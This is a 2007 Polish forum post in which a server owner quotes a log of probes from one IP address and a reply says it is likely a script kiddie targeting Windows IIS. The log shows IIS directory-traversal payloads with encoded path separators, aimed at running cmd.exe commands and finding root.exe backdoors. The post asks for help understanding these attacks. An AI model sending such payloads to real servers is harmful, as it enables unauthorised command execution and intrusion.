2007-07-27 18:38:20 douglasmclloyd napisał:
> Codziennie jakieś dziady próbują mi się włamać do servera. Ostatnio w logu znalazłem coś
> takiego. Czy ktoś wie co te ku... próbują zrobić?
>
> A total of 1 sites probed the server
> 24.12.183.239
>
> Requests with error response codes
> 400 Bad Request
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> 404 Not Found
> /MSADC/root.exe?/c+dir: 1 Time(s)
> /_mem_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s)
> /_vti_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s)
> /c/winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /d/winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /favicon.ico: 3 Time(s)
> /msadc/..%255c../..%255c../..%255c/..%c1%1 ... /cmd.exe?/c+dir: 1 Time(s)
> /robots.txt: 61 Time(s)
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
> /scripts/root.exe?/c+dir: 1 Time(s)
> /tmp: 1 Time(s)
Sądząc po częstych próbach odpalenia cmd.exe podejrzewam, że to jakiś idiota próbuje się włamać do ciebie myśląc, że masz winde i IIS. To pewnie jakiś scriptkid.